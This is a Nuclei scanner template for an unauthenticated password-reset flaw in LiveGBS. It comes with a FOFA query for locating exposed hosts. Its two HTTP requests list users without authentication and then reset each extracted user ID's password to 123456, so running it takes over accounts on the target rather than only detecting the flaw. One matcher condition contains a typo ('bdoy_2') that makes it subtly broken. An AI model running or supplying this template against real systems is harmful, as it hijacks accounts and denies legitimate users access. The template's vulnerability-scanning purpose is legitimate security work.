id: livegbs-resetpassword
info:
  name: LiveGBS - 任意用户密码重置漏洞
  author: leadlife
  severity: high
  description: LiveGBS部分接口存在未授权访问导致，可以通过组合漏洞修改任意用户密码
  reference: 
    - https://github.com/wy876/POC/blob/main/LiveGBS/LiveGBS%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B7%E5%AF%86%E7%A0%81%E9%87%8D%E7%BD%AE%E6%BC%8F%E6%B4%9E.md
  metadata:
    verified: true
    max-request: 1
    fofa-query: icon_hash="-206100324"
  tags: livegbs,resetpasswords


http:
  - raw:
      - |
        GET /api/v1/user/list?q=&start=&limit=10&enable=&sort=CreatedAt&order=desc HTTP/1.1
        Host: {{Hostname}}

      - |+
        GET /api/v1/user/resetpassword?id={{username_id}}&password=123456 HTTP/1.1
        Host: {{Hostname}}

    extractors: 
      - type: json
        part: body_1
        internal: true
        name: username_id
        json:
          - '.UserList[].ID'

    matchers:
      - type: dsl
        dsl:
          - status_code_1 == 200 && status_code_2 == 200
          - contains_all(body_1,'Username','Role','Enable','HasAllChannel','CreatedAt','UpdatedAt')
          - contains(bdoy_2,'OK')
        condition: and